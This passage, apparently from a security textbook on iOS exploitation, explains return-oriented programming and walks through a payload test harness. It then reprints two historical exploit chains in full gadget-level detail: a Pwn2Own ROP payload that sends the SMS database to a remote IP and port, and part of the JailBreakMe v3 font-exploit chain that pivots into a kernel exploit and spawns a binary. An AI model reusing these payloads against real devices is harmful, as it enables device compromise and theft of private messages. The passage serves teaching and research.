}

The vital parts of this code are the assembly snippets. The first one in the read_and_exec function stores the stack pointer and the instruction pointer of the function in two variables before executing the shellcode. This allows the application to restore the execution after the payload is executed instead of just crashing.

The second assembly snippet of the function effectively runs the ROP payload. It changes the stack pointer so that it points to the heap buffer containing the shellcode and then it pops a number of registers, including the instruction pointer, from the shellcode. At this point the ROP payload is running. These actions are normally the job of the exploit.

The assembly snippet in restoreStack makes sure that the instruction pointer and the stack pointer of the read_and_exec function are restored after the payload is done. This is achieved by sending back to the client the address of the restoreStack function. The client, a Python script, appends the address of the function at the end of the payload so that the execution could potentially resume if the ROP payload ends with a reset of the instruction pointer.
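The exchange between client and server can be sketched as follows. This is not the client distributed with the book; it is a minimal illustration that assumes both sides use 32-bit little-endian integers, and recv_exact and send_payload are hypothetical names. Because the server pops r0–r6 and then pc from the start of the buffer, the first seven words of the payload load those registers and the eighth is the first gadget address.

```python
import socket
import struct


def recv_exact(sock: socket.socket, count: int) -> bytes:
    """Read exactly `count` bytes or raise if the peer closes early."""
    data = b""
    while len(data) < count:
        chunk = sock.recv(count - len(data))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        data += chunk
    return data


def send_payload(sock: socket.socket, words) -> int:
    """Run the harness protocol: length, restoreStack address, payload.

    The length is sent first, so it must already count the extra word that
    holds the restoreStack address appended at the end of the payload.
    """
    length = 4 * (len(words) + 1)
    sock.sendall(struct.pack("<i", length))
    (restore_address,) = struct.unpack("<I", recv_exact(sock, 4))
    sock.sendall(struct.pack(f"<{len(words) + 1}I", *words, restore_address))
    return restore_address
```

A typical use would be to connect a TCP socket to the harness and call send_payload(sock, words) with the list of 32-bit words that make up the crafted stack.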

The full source code for both the client and the server is available on this book's website at www.wiley.com/go/ioshackershandbook.

When testing a payload, it is very important to take into consideration the differences between the sandbox profile of the testing application and the profile of the target application. In general, you can expect to have the same sandbox profile for the testing application and an App Store application. (See Chapter 5 for more information about sandbox profiles.)

Unfortunately, that is not the case for most of the system executables. In fact, they tend to have more permissive profiles. This might result in failed function invocations when testing the payload with the test harness.

Finally, as long as the ROP gadgets come from system libraries, it is always possible to tweak the testing harness to link against the specific library. Unfortunately, if the selected gadgets reside inside the main binary, it is not possible to debug it using this methodology.

Examples of ROP Shellcode on iOS

In this section we show and comment on two typical examples of ROP shellcode on iOS.

The first payload was used for the PWN2OWN competition in 2010 to exfiltrate the content of the SMS database, and it is a good example of ROP-only shellcode.

The second payload was used as part of the jailbreakme.com v3 exploit for iOS prior to 4.3.4. It is a great example of how to minimize a ROP payload and use it as a pivot to trigger a kernel vulnerability.

Exfiltrate File Content Payload

This payload is based on binaries from iOS 3.1.3 for iPhone 3GS. The first thing it does is gain control of the stack pointer and various other registers. At the beginning of the shellcode execution, the only register under the attacker's control is R0, which points to a 40-byte buffer:

     // 3298d162      6a07    ldr   r7, [r0, #32]
     // 3298d164    f8d0d028    ldr.w  sp, [r0, #40]
     // 3298d168      6a40    ldr   r0, [r0, #36]
     // 3298d16a     4700    bx   r0

Knowing that R0 and its content are under an attacker's control, the payload sets R7 to point to another attacker-controlled location that will pose as a stack frame. The stack pointer points to arbitrary memory because it is past the 40 bytes under attacker control, therefore the attacker needs another gadget to set it properly.

This is achieved by storing the address 0x328c23ee at offset 36 of the buffer; the first gadget loads it into R0 and branches to it with its last instruction. The second gadget looks like this:

     // 328c23ee        f1a70d00        sub.w   sp, r7, #0
     // 328c23f2            bd80        pop     {r7, pc}

This effectively moves the content of R7 into the stack pointer and thus sets the stack to an attacker-controlled location. From here on the instruction pointer is retrieved from the ROP payload supplied by the attacker.
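The effect of the two pivot gadgets can be traced with a small Python model. This is only a sketch: the buffer and fake-stack addresses (BUF and FAKE_STACK) are hypothetical, memory is modeled as a dictionary of 32-bit words, and the two words placed on the fake stack are the first two entries of the payload shown later in this section.

```python
def simulate_pivot(memory, r0):
    """Emulate both pivot gadgets over a {address: 32-bit word} memory model."""
    # Gadget 1 (0x3298d162)
    r7 = memory[r0 + 32]                   # ldr   r7, [r0, #32]
    uncontrolled_sp = memory.get(r0 + 40)  # ldr.w sp, [r0, #40], past the 40 controlled bytes
    branch = memory[r0 + 36]               # ldr   r0, [r0, #36] ; bx r0
    # Gadget 2 (0x328c23ee)
    sp = r7                                # sub.w sp, r7, #0
    r7 = memory[sp]                        # pop   {r7, pc}: first popped word goes to r7
    pc = memory[sp + 4]                    #                 second popped word goes to pc
    sp += 8
    return {"branch": branch, "r7": r7, "pc": pc, "sp": sp}

BUF = 0x00100000         # hypothetical address of the 40-byte buffer
FAKE_STACK = 0x00200000  # hypothetical address of the ROP payload

memory = {
    BUF + 32: FAKE_STACK,        # becomes r7, then sp
    BUF + 36: 0x328c23ee,        # address of the second gadget
    FAKE_STACK: 0x87654321,      # dummy r7
    FAKE_STACK + 4: 0x32986a41,  # first gadget of the real payload
}
state = simulate_pivot(memory, BUF)
```

After the second gadget runs, the stack pointer sits two words into the attacker's buffer and the instruction pointer holds the first gadget address taken from it.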

The rest of the payload performs the following operations, written in pseudo-C:

AudioServicesPlaySystemSound(0xfff);
int fd = open("/private/var/mobile/Library/SMS/sms.db", O_RDONLY);
int sock = socket(PF_INET, SOCK_STREAM, 0);
struct sockaddr address;

connect(sock, &address, sizeof(address));
struct stat buf;
stat("/private/var/mobile/Library/SMS/sms.db", &buf);
void *file = mmap(0, buf.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
write(sock, file, buf.st_size);
sleep(1);
close(fd);
exit(0);

The first call is not strictly related to the payload itself. In fact, it is only used to make the phone vibrate for debugging purposes. From there on both the SMS database and a socket are opened. Then, to obtain the size of the file, stat() is called.

To send the file, the payload maps it into memory using mmap() and then writes it to the remote server. At this point the attacker is forced to call sleep() before exiting the application; otherwise the connection to the remote server might be closed before the entire file is sent.

Of course, any programmer might notice that the correct way of sending the file would have been to have a loop sending small chunks one by one until the end of the file. The issue is that writing loops using ROP is not an easy task unless a ROP compiler, as outlined in the section “Automating ROP Payload Construction,” is used. This is also a clear sign that the payload was written by hand.
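For comparison, the chunked sending loop mentioned above is trivial outside of ROP. The following Python sketch is not part of the original payload; the name write_all and the chunk size are our own, and the write argument stands for any function that, like write() or send(), returns the number of bytes it accepted.

```python
def write_all(write, data, chunk_size=4096):
    """Send data in small chunks until everything has been written.

    write -- callable taking a bytes-like object and returning how many
             bytes were actually accepted (possibly fewer than offered)
    """
    view = memoryview(data)
    sent = 0
    while sent < len(view):
        n = write(view[sent:sent + chunk_size])
        if n is None or n <= 0:
            raise OSError("write made no progress")
        sent += n  # advance only by what was really written
    return sent
```

With a connected socket, write_all(sock.send, data) would keep sending until the whole buffer is delivered. The loop and the conditional inside it are exactly the constructs that are painful to express as a hand-written gadget chain.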

Before showing the rest of the payload, you need to understand that in this specific example, the attacker knows the address of the fake stack pointer and therefore can easily address and store data structures relative to the fake stack pointer. The rest of the payload, along with comments, is shown in the following code. Execution begins at the address stored in the second entry of the ropvalues array (0x32986a41) in the stealFile_rop_3_1_3_gs function:

function stealFile_rop_3_1_3_gs(sp)
{
      var ropvalues = Array(244);

      function sockaddr_in(ip, port)
      {
            var a = String.fromCharCode(0x210); // sin_family=AF_INET, sin_len=16
            var b = String.fromCharCode(((ip[1]&255)<<8)+(ip[0]&255));
            var c = String.fromCharCode(((ip[3]&255)<<8)+(ip[2]&255));
            var p = String.fromCharCode(((port >> 8) &0xff)+((port&0xff)<<8));
            var fill = String.fromCharCode(0);
            fill += fill;
            fill += fill;
            return a + p + b + c + fill;
      }

      function encode_ascii(str)
      {
            var i, a = 0;
            var encoded = "";

            for(i = 0; i < str.length; i++) {
                  if (i&1) {
                        encoded += String.fromCharCode((str.charCodeAt(i) << 8) + a);
                  } else {
                        a = str.charCodeAt(i);
                  }
            }
            return encoded + String.fromCharCode((i&1) ? a : 0);
      }

      // 40 bytes (38 bytes ASCII, 2 bytes zero termination)
      var name = encode_ascii("/private/var/mobile/Library/SMS/sms.db");
      // 16 bytes
      var sockStruct = sockaddr_in(Array(192,168,0,3), 9090);
      var i = 0;

      var locSockStruct = sp + 4*244;
      var locFD = sp + 4*244-4;
      var locSock = locFD - 4;
      var locMappedFile = locSock -4;
      var locStat = locMappedFile - 108;
      var locFilename = locSockStruct + 0x10;

      ropvalues[i++]= 0x87654321; // dummy r7
      ropvalues[i++]= 0x32986a41; // LR->PC (thumb)
            // next chunk executed: set LR
      // 32986a40  e8bd4080   pop   {r7, lr}
      // 32986a44    b001 add sp, #4
      // 32986a46    4770 bx lr

      ropvalues[i++]=0x12345566; // dummy r7
      ropvalues[i++]=0x32988673; // LR (thumb mode)
      ropvalues[i++]=0x11223344; // padding, skipped over by add sp, #4

      // next chunk executed: call single-parameter function
      // 32988672    bd01 pop {r0, pc}

      ropvalues[i++]=0x00000fff; // r0
      ropvalues[i++]=0x30b663cd; // PC

      // LIBRARY CALL
      // 0x30b663cc <AudioServicesPlaySystemSound> 
      // AudioServicesPlaySystemSound uses LR to return to 0x32988673
      // 32988672    bd01 pop {r0, pc}

      ropvalues[i++]=0x00000000; // r0
      ropvalues[i++]=0x32986a41; // PC
      // next chunk executed: set LR
      // 32986a40  e8bd4080   pop   {r7, lr}
      // 32986a44    b001 add sp, #4
      // 32986a46    4770 bx lr

      ropvalues[i++]=0x12345566; // dummy r7
      ropvalues[i++]=0x32988d5f; // LR (thumb mode)
      ropvalues[i++]=0x12345687; // padding, skipped over by add sp, #4

      // next chunk executed: load R0-R3
      // 32988d5e   bd0f pop {r0, r1, r2, r3, pc}

      ropvalues[i++]=locFilename;      // r0  filename
      ropvalues[i++]=0x00000000;      // r1  O_RDONLY
      ropvalues[i++]=0x00000000;      // dummy r2
      ropvalues[i++]=0xddddeeee;      // dummy r3
      ropvalues[i++]=0x32910d4b;      // PC

      // next chunk executed: call open
      // 32910d4a e840f7b8 blx open
      // 32910d4e   bd80 pop {r7, pc}

      ropvalues[i++] =0x33324444;      // r7
      ropvalues[i++] =0x32987baf;      // PC
      //32987bae   bd02    pop {r1, pc}

      ropvalues[i++] = locFD-8;   //r1 points to the FD
      ropvalues[i++] = 0x32943b5c; //PC
      //32943b5c e5810008 str r0, [r1, #8]
      //32943b60 e3a00001 mov r0, #1 ; 0x1
      //32943b64 e8bd80f0 ldmia sp!, {r4, r5, r6, r7, pc}

      ropvalues[i++] = 0x00000000; //padding
      ropvalues[i++] = 0x00000000; // padding
      ropvalues[i++] = 0x12345687;
      ropvalues[i++] = 0x12345678;
      ropvalues[i++] = 0x32986a41; // PC
      //32986a40    e8bd4080     pop   {r7, lr}
      //32986a44    b001    add sp, #4
      //32986a46    4770    bx lr

      ropvalues[i++]=0x12345566; // r7
      ropvalues[i++]=0x32987baf; // LR
      ropvalues[i++]=0x12345678; // padding
      //32987bae   bd02 pop {r1, pc}

      ropvalues[i++] =0x33324444;  // r7
      ropvalues[i++]=0x32988d5f; // PC
      //32988d5e   bd0f pop {r0, r1, r2, r3, pc}

      ropvalues[i++] =0x00000002;      // r0  domain
      ropvalues[i++] =0x00000001;      // r1  type
      ropvalues[i++] =0x00000000;      // r2 protocol
      ropvalues[i++] =0xddddeeee;      // r3
      ropvalues[i++] =0x328e16dc;      // call socket

      //socket returns to lr which points to 32987bae

      ropvalues[i++] = locSock-8; //r1 points to locSock
      ropvalues[i++] = 0x32943b5c; //PC
      //32943b5c e5810008 str r0, [r1, #8]
      //32943b60 e3a00001 mov r0, #1; 0x1
      //32943b64 e8bd80f0 ldmia    sp!, {r4, r5, r6, r7, pc}

      ropvalues[i++] = 0x00000000;
      ropvalues[i++] = 0x00000000;
      ropvalues[i++] = 0x12345687;
      ropvalues[i++] = 0x66554422;
      ropvalues[i++] = 0x32988d5f; // PC
      //32988d5e   bd0f pop {r0, r1, r2, r3, pc}

      ropvalues[i++] = locSock;      // r0  socket
      ropvalues[i++] = locSockStruct;  // r1  struct
      ropvalues[i++] =0x00000010;      // r2 struct size
      ropvalues[i++] =0xddddeeee;      // r3
      ropvalues[i++] = 0x328c4ac9;      //
      //328c4ac8      6800    ldr   r0, [r0, #0]
      //328c4aca      bd80    pop   {r7, pc}

      ropvalues[i++]= 0x99886655; //garbage r7
      ropvalues[i++] = 0x328e9c30; //call connect
                  //connect returns to lr which points to 32987bae

      ropvalues[i++] = 0x00000000; //r1
      ropvalues[i++] = 0x32988d5f; // PC
      //32988d5e   bd0f pop {r0, r1, r2, r3, pc}

      ropvalues[i++] = locFilename; // r0, filename
      ropvalues[i++] = locStat; // r1, stat structure
      ropvalues[i++] = 0x00000000;
      ropvalues[i++] = 0x00000000;
      ropvalues[i++] = 0x328c2a4c; //call stat

      //stat returns to lr which points to 32987baf

      ropvalues[i++] = 0xabababab; //r1
      ropvalues[i++] = 0x328c722c; //PC
      //328c722c e8bd8330 ldmia sp!, {r4, r5, r8, r9, pc}

      ropvalues[i++] = 0x00000000; //r4 which will be the address for mmap
      ropvalues[i++] = 0x00000000; //r5 whatever
      ropvalues[i++] = 0x000000000; //r8 is gonna be the file len for mmap
      ropvalues[i++] = 0x000000002; //r9 MAP_PRIVATE copied in r3
      ropvalues[i++] = 0x32988d5f; // PC
      //32988d5e   bd0f pop {r0, r1, r2, r3, pc}
      ropvalues[i++] = locFD - 36;            // r0 will be the filedes for mmap
      ropvalues[i++] = locStat +60;            // r1 struct stat file size
      ropvalues[i++] = 0x00000001;            // r2 PROT_READ
      ropvalues[i++] = 0x00000000;            // r3 has to be a valid address, but we don't care what it is
      ropvalues[i++] = 0x32979837;
      //32979836      6a43    ldr   r3, [r0, #36]
      //32979838      6a00    ldr   r0, [r0, #32]
      //3297983a      4418    add   r0, r3
      //3297983c      bd80    pop   {r7, pc}

      ropvalues[i++] = sp + 73*4 + 0x10; //r7 whatever
      ropvalues[i++] = 0x32988673;
      //32988672      bd01  pop  {r0, pc}

      ropvalues[i++] = sp -28; //r0 has to be a piece of memory we don't care about
      ropvalues[i++] = 0x329253eb;
      //329253ea      6809    ldr   r1, [r1, #0]
      //329253ec      61c1    str   r1, [r0, #28]
      //329253ee     2000    movs  r0, #0
      //329253f0      bd80    pop   {r7, pc}
            ropvalues[i++] = sp + 75*4 + 0xc; //r7
      ropvalues[i++] = 0x328C5CBd;
      //328C5CBC         STR   R3, [SP,#0x24+var_24]
      //328C5CBE         MOV   R3, R9
      //328C5CC0         STR   R4, [SP,#0x24+var_20]
      //328C5CC2         STR   R5, [SP,#0x24+var_1C]
      //328C5CC4         BLX   _mmap
      //328C5CC8 loc_328C5CC8           ; CODE XREF: _mmap+50j
      //328C5CC8         SUB.W  SP, R7, #0x10
      //328C5CCC         LDR.W  R8, [SP+0x24+var_24],#4
      //328C5CD0         POP   {R4-R7,PC}

      ropvalues[i++] = 0xbbccddee; //we need some padding for the previously stored stuff on the stack
      ropvalues[i++] = 0x00000000;
      ropvalues[i++] = 0x00000000;
      ropvalues[i++] = 0x00000000;
      ropvalues[i++] = 0x32987baf;
      //32987bae   bd02 pop {r1, pc}

      ropvalues[i++] = locMappedFile -8; // r1 points to the mapped file in-memory
      ropvalues[i++] = 0x32943b5c;      // PC
      //32943b5c e5810008 str r0, [r1, #8]
      //32943b60 e3a00001 mov r0, #1 ; 0x1
      //32943b64 e8bd80f0 ldmia sp!, {r4, r5, r6, r7, pc}

      ropvalues[i++] = sp; //will be overwritten
      ropvalues[i++] = 0x00000000;
      ropvalues[i++] = 0x12345687;
      ropvalues[i++] = 0x12345678;
      ropvalues[i++] = 0x32988d5f; // PC
      //32988d5e   bd0f pop {r0, r1, r2, r3, pc}

      ropvalues[i++] = sp -28;      // r0 overwritten when loading r1
      ropvalues[i++] = locMappedFile;  // r1  whatever
      ropvalues[i++] = 0x00000000;      // r2  filled later
      ropvalues[i++] = locStat + 60;      // used later to load stuff into r2
      ropvalues[i++] = 0x3298d351;
      //3298d350      681a    ldr   r2, [r3, #0]
      //3298d352      6022    str   r2, [r4, #0]
      //3298d354      601c    str   r4, [r3, #0]
      //3298d356     bdb0    pop   {r4, r5, r7, pc}
            ropvalues[i++] = 0x00000000;
      ropvalues[i++] = 0x00000000;
      ropvalues[i++] = 0x00000000;
      ropvalues[i++] = 0x329253eb;
      //329253ea      6809    ldr   r1, [r1, #0]
      //329253ec      61c1    str   r1, [r0, #28]
      //329253ee      2000    movs  r0, #0
      //329253f0      bd80    pop   {r7, pc}

      ropvalues[i++] = 0x11223344;
      ropvalues[i++] = 0x32988673;
      //32988672      bd01  pop  {r0, pc}

      ropvalues[i++] = locSock;
      ropvalues[i++] = 0x328c4ac9;
      //328c4ac8      6800    ldr   r0, [r0, #0]
      //328c4aca      bd80    pop   {r7, pc}

      ropvalues[i++]= 0x88776655; //garbage r7
      ropvalues[i++] = 0x32986a41; // PC
      //32986a40    e8bd4080     pop   {r7, lr}
      //32986a44    b001     add  sp, #4
      //32986a46    4770    bx  lr

      ropvalues[i++]=0x12345566; // r7
      ropvalues[i++]=0x3298d3ab; // LR
      ropvalues[i++]=0x12345678; // padding
      //3298d3aa      bd00  pop  {pc}
                  ropvalues[i++] = 0x328e456c;  // call write

      // write returns to lr which points to 0x3298d3ab
            ropvalues[i++] = 0x32988673;
      // 32988672    bd01  pop  {r0, pc}
            ropvalues[i++] = 0x00000001;
      ropvalues[i++] = 0x328fa335; //call sleep();

      // sleep returns to lr which points to 0x3298d3ab

      ropvalues[i++] = 0x32988673;
      // 32988672    bd01  pop   {r0, pc}

      ropvalues[i++] = locFD;       // r0   fd 
      ropvalues[i++] = 0x328c4ac9;//
      //328c4ac8       6800    ldr    r0, [r0, #0]
      //328c4aca       bd80    pop    {r7, pc}

      ropvalues[i++] = 0xccccdddd;
      ropvalues[i++] = 0x328c8d74; //call close()
            // close returns to lr which points to 0x3298d3ab

      ropvalues[i++] = 0x328e469d; // call exit()
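The helper functions at the top of the listing build raw bytes out of JavaScript strings, which hides the underlying layout. The following Python sketch produces the same bytes with explicit packing and recomputes the data locations relative to the fake stack pointer. It is an illustration only: the Python function names and the sample stack address are our own, and the sketch assumes the little-endian, two-bytes-per-character string layout that the JavaScript helpers rely on.

```python
import socket
import struct

def sockaddr_in(ip, port):
    """BSD-style sockaddr_in: sin_len, sin_family, port, address, 8 zero bytes."""
    return (struct.pack("BB", 16, 2)   # sin_len=16, sin_family=AF_INET (2)
            + struct.pack("!H", port)  # port in network byte order
            + socket.inet_aton(ip)     # 4 address bytes
            + b"\x00" * 8)             # sin_zero padding

def encode_ascii(text):
    """NUL-terminate an ASCII string and pad it to an even number of bytes."""
    data = text.encode("ascii") + b"\x00"
    if len(data) % 2:
        data += b"\x00"
    return data

def data_layout(sp, nwords=244):
    """Addresses of the payload's data, relative to the fake stack pointer."""
    loc_sock_struct = sp + 4 * nwords   # data starts right after the ROP words
    loc_fd = loc_sock_struct - 4
    loc_sock = loc_fd - 4
    loc_mapped_file = loc_sock - 4
    loc_stat = loc_mapped_file - 108    # room reserved for struct stat
    loc_filename = loc_sock_struct + 0x10
    return {
        "locSockStruct": loc_sock_struct, "locFD": loc_fd, "locSock": loc_sock,
        "locMappedFile": loc_mapped_file, "locStat": loc_stat,
        "locFilename": loc_filename,
    }

sock_struct = sockaddr_in("192.168.0.3", 9090)
name = encode_ascii("/private/var/mobile/Library/SMS/sms.db")
layout = data_layout(0x1000)  # hypothetical fake stack address
```

The socket structure and the filename sit immediately after the 244 ROP words, while the file descriptor, the socket, the mapped-file pointer, and the stat buffer occupy the last words of the array itself.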

Using ROP to Chain Two Exploits (JailBreakMe v3)

As briefly shown in Chapter 7, the JailBreakMe v3 exploit (also known as Saffron) by comex is one of the most impressive exploits publicly available for iOS. We do not go into the details of the exploit itself, but to understand the ROP payload, there is one important detail to take into account.

Starting with iOS 4.3, Apple introduced address space layout randomization (ASLR); therefore, any exploit that relies on ROP needs to discover the base address of a module. Saffron uses an information leak to determine the base address of the dyld_shared_cache, where all libraries are stored. Once the base address is leaked, Saffron relocates the entire ROP payload accordingly.
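The arithmetic behind this relocation is simple and can be sketched in Python. The static address of T1_Parse_Glyph (0x3373f641) and the gadget address (0x30005cbd) are taken from the listings later in this section; the leaked runtime address is a made-up value, and the function names are ours.

```python
MASK32 = 0xFFFFFFFF

T1_PARSE_GLYPH_STATIC = 0x3373f641  # address of T1_Parse_Glyph inside the library

def aslr_slide(leaked_addr, static_addr=T1_PARSE_GLYPH_STATIC):
    """Slide = where the function really is minus where the library says it is."""
    return (leaked_addr - static_addr) & MASK32

def relocate(addr, slide):
    """Apply the slide to a gadget address, wrapping at 32 bits."""
    return (addr + slide) & MASK32

leaked = 0x338e2641  # hypothetical value returned by the information leak
slide = aslr_slide(leaked)
gadget = relocate(0x30005cbd, slide)
```

Since the whole dyld_shared_cache moves as one block, a single leaked function address is enough to relocate every gadget taken from it.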

Saffron exploits a vulnerability in the PDF reader. Therefore, the entire payload is written using the T1 language. The font file contains several routines. Some of them are particularly useful to understand how the ROP payload works.

You can find a detailed explanation of the exploit at http://esec-lab.sogeti.com/post/Analysis-of-the-jailbreakme-v3-font-exploit. Here we focus on the components that are of interest for the subject. The two routines responsible for writing the payload to memory are routine 8 and routine 9, depending on the iPhone model. A number of auxiliary routines are used:

  • Routines 4, 5, and 7 push values onto the stack, taking into consideration the ASLR slide.
  • Routine 6 pushes a dword added to a stack offset obtained in the exploitation phase.
  • Routines 20 and 21 add or subtract values pushed onto the stack.
  • Routine 24 saves a value pushed onto the stack to an attacker-controlled location.
  • Routine 25 pushes onto the stack an address stored in an attacker-controlled location.
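The role of the routines that write dwords can be modeled with a few lines of Python. This is a deliberately simplified sketch and not a reimplementation of the font program: the class and its stack_base parameter are hypothetical, the method names borrow the subr_put_dword and subr_put_dword_adjust_lib labels that appear in the disassembly later in this section, and the exact behavior of each routine is documented in the analysis referenced above.

```python
import struct

MASK32 = 0xFFFFFFFF

class PayloadWriter:
    """Collects the 32-bit words of a ROP payload, relocating them as needed."""

    def __init__(self, aslr_slide, stack_base):
        self.aslr_slide = aslr_slide  # delta computed from the information leak
        self.stack_base = stack_base  # stack offset found during exploitation
        self.words = []

    def put_dword(self, value):
        """Write a plain value (padding, constants) as is."""
        self.words.append(value & MASK32)

    def put_dword_adjust_lib(self, value):
        """Write a library address corrected by the ASLR slide."""
        self.words.append((value + self.aslr_slide) & MASK32)

    def put_dword_adjust_stack(self, value):
        """Write a value added to the stack offset (the job of routine 6)."""
        self.words.append((value + self.stack_base) & MASK32)

    def to_bytes(self):
        """Serialize the payload as little-endian 32-bit words."""
        return struct.pack("<%dI" % len(self.words), *self.words)

writer = PayloadWriter(aslr_slide=0x1000, stack_base=0x2fe00000)  # made-up values
writer.put_dword(0x0)
writer.put_dword(0x0)
writer.put_dword_adjust_lib(0x30005cbd)
```

Keeping the relocation inside the writer means that the payload itself can be expressed with static addresses, which is what makes it practical to generate from a script.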

With this information in mind, it is now possible to explain what the shellcode does. The ROP payload in userland roughly performs the following operations in pseudo-C:

mach_port_t self = mach_task_self();
mlock(addr, 0x4a0);
match = IOServiceMatching("AppleRGBOUT");
IOKitWaitQuiet(0, 0);
amatch = IOServiceGetMatchingService(0, match);
IOServiceOpen(amatch, self, 0, &connect);
IOConnectCallScalarMethod(connect, 21, callback, 2, 0, 0);
IOConnectCallStructMethod(connect, 5, kpayload, 0xd8, 0, 0);
IOServiceClose(connect);
munlock(addr, 0x4a0);
void *locutusptr =  malloc(0x8590);
zlib.uncompress(locutusptr, 0x8590, locutussource,0x30eb);
fd = open("/tmp/locutus", O_WRONLY | O_CREAT | O_TRUNC, 0755);
write(fd, locutusptr, 0x8590);
close(fd);
posix_spawn(0, "/tmp/locutus", 0, 0, NULL, NULL);
// this will resume the execution
r0 = 1337;
sp = crafted_offset;

What this code does first is map a ROP kernel-land shellcode (kpayload) at a specific address. Afterward, it locates the AppleRGBOUT IOKit service and triggers the vulnerability in the module with the two IOConnectCall functions. At this point the kernel shellcode is executed. This shellcode is again ROP, and it will disable a number of protections, including code signing, so that later on when the execution goes back to userland, the locutus application can run. In fact, the shellcode then continues by unmapping the shellcode, decompressing the locutus binary, writing it to a file, and spawning it.

Finally, to avoid crashing MobileSafari, the execution is restored by carefully setting the stack pointer to a safe location and R0 to a value that represents the return value of the vulnerable function.

Analyzing the entire ROP payload would take a whole chapter because of its size and complexity. Therefore, we focus only on some specific gadgets and recurring patterns in it.

First of all, the entire payload is written using Python code that wraps the necessary gadgets. Therefore, there is a high density of repetitive instructions in the resulting shellcode. Without a doubt, the most used and interesting one is the gadget used to call a function. The following gadgets correspond to this C function call, which is used quite frequently in the payload for debugging purposes:

char *str;
fprintf(stderr, "Result for %s was %08x\n",  str);
//it starts with a pop{r4, r7, pc}
0x1e79c      //r4, this is an address that will be adjusted with the infoleak
0x0          //r7
0x3002b379   //pc, this does: ldr r0, [r0, #0] pop{r7, pc}
0x0          //r7
0x32882613   //pc, this does: str r0, [r4, #0] pop{r4, pc}
0x1e4c4      //r4, this address will be adjusted with the infoleak
0x32882613   //pc, this does: str r0, [r4, #0] pop{r4, pc}
0x32c928fd   //r4, address of fprintf
0x30fb7538   //pc, this does: pop {r0, r1, r2, r3, pc}
0x3e810084   //r0, address of _stderrp
0x1eec8      //r1, address adjusted with the infoleak
0x1eee0      //r2, address adjusted with the infoleak
0x0          //r3
0x3002b379   //pc, this does: ldr r0, [r0, #0] pop{r7, pc}
0x1e4d8      //r7, adjusted with the infoleak
0x3001a889   //pc, this does: blx r4 sub sp, r7, #4 pop{r4, r7, pc}
0x332a6129   //r4, address of mach_task_self
0x1e4e4      //r7, adjusted with the infoleak
0x3001a889   //pc, this does: blx r4 sub sp, r7, #4 pop{r4, r7, pc}

For the most part, the rest of the code is nothing too complex and it makes heavy use of the previously demonstrated pattern to perform function invocation. The other two relevant parts of the shellcode are the beginning and the end, where the ASLR delta is computed and the execution is restored, respectively.
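To give an idea of how a script can wrap such a pattern, the following Python sketch regenerates the middle of the preceding listing, from the pop {r0, r1, r2, r3, pc} gadget to the blx r4 gadget. It is not comex's code: the helper names are hypothetical, and the values are the pre-relocation ones shown in the listing. The sketch assumes that R4 already holds the address of the function to call, as arranged by the gadget that precedes this sequence.

```python
# Gadget addresses as they appear in the listing (before ASLR adjustment).
POP_R0_R3_PC = 0x30fb7538        # pop {r0, r1, r2, r3, pc}
DEREF_R0_POP_R7_PC = 0x3002b379  # ldr r0, [r0, #0] ; pop {r7, pc}
BLX_R4 = 0x3001a889              # blx r4 ; sub sp, r7, #4 ; pop {r4, r7, pc}

def gadget(addr, *popped):
    """A gadget address followed by the words that the gadget pops."""
    return [addr] + list(popped)

def call_with_deref_r0(r0_ptr, r1, r2, r3, r7):
    """Load r0-r3, replace r0 with the word it points to, then call through r4."""
    return (gadget(POP_R0_R3_PC, r0_ptr, r1, r2, r3)
            + gadget(DEREF_R0_POP_R7_PC, r7)
            + gadget(BLX_R4))

# The fprintf call from the listing: r0 = *_stderrp, r1 and r2 are the arguments.
chain = call_with_deref_r0(0x3e810084, 0x1eec8, 0x1eee0, 0x0, 0x1e4d8)
```

Each gadget address lands in the slot that the previous gadget pops into PC, which is why a helper only has to emit its own address followed by the values it consumes.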

The T1 routine responsible for writing the payload executes the following instructions at the beginning:

0x00000000  8c           push 0x1                
0x00000001  8c           push 0x1                
0x00000002  a4           push 0x19               
0x00000003  0c 10        callothersubr #25 nargs=1 ; get_buildchar top[0] = decoder->buildchar[idx];

This sequence simply pushes in reverse order the routine number, 0x19, the number of parameters, 0x1, and the parameter to pass to the function. The function pushes onto the stack the address of the C function T1_Parse_Glyph, leaked with the exploit. Later, the following code is executed:

0x00000005  ff 33 73 f6 41   push 0x3373f641         
0x0000000c  8d           push 0x2                
0x0000000d  a0           push 0x15               
0x0000000e  0c 10        callothersubr #21 nargs=2 ; subtract top[0] -= top[1]; top++

Routine 21 takes the two values pushed onto the stack (the address of the T1_Parse_Glyph function found in-memory and the original address of the same function found inside the library) and pushes the difference between the two that will be stored later in an attacker-controlled location with the following code:

0x00000010  8c           push 0x1                
0x00000011  8d           push 0x2                
0x00000012  a3           push 0x18               
0x00000013  0c 10        callothersubr #24 nargs=2 ; set_buildchar decoder->buildchar[idx] = top[0];

This location that now contains the ASLR delta is used by routines 4, 5, and 7 to correctly relocate the rest of the payload. The next step is to calculate the address of a specific gadget that increments the stack pointer. This is done with the following code:

0x00000015  8b           push 0x0                
0x00000016  ff 32 87 9f 4b   push 0x32879f4b         
0x0000001d  8c           push 0x1                
0x0000001e  8c           push 0x1                
0x0000001f  a4           push 0x19               
0x00000020  0c 10        callothersubr #25 nargs=1 ; get_buildchar top[0] = decoder->buildchar[idx];
0x00000022  8d           push 0x2                
0x00000023  9f           push 0x14               
0x00000024  0c 10        callothersubr #20 nargs=2 ; add top[0] += top[1]; top++
0x00000026  0c 21        op_setcurrentpoint       ; top -= 2; x=top[0]; y=top[1]; decoder->flex_state=0

The gadget stored in memory is the first one executed and performs the following operation:

add sp, #320
pop {r4, r5, pc}

The next code snippet pushes onto the stack three dwords necessary for the preceding gadget to work:

0x00000028  8b           push 0x0                
0x00000029  8f           push 0x4                
0x0000002a  0a           callsubr #04             ; subr_put_dword
0x0000002b  8b           push 0x0                
0x0000002c  8f           push 0x4                
0x0000002d  0a           callsubr #04             ; subr_put_dword
0x0000002e  ff 30 00 5c bd   push 0x30005cbd         
0x00000033  ff 00 05 00 00   push 0x5            
0x00000038  0a           callsubr #05             ; subr_put_dword_adjust_lib

This code effectively pushes onto the stack the following dwords:

0x0
0x0
0x30005cbd + ASLR offset

From there, the stack pointer is adjusted once again and the rest of the ROP payload is executed. The final part of the payload sets the register R0 to 1337 and then sets the stack pointer to a location that allows the attacker to resume execution:

0x00000aff  ff 10 00 05 39     push 0x10000539         
0x00000b04  ff 10 00 00 00     push 0x10000000         
0x00000b09  ff 00 02 00 00     push 0x2            
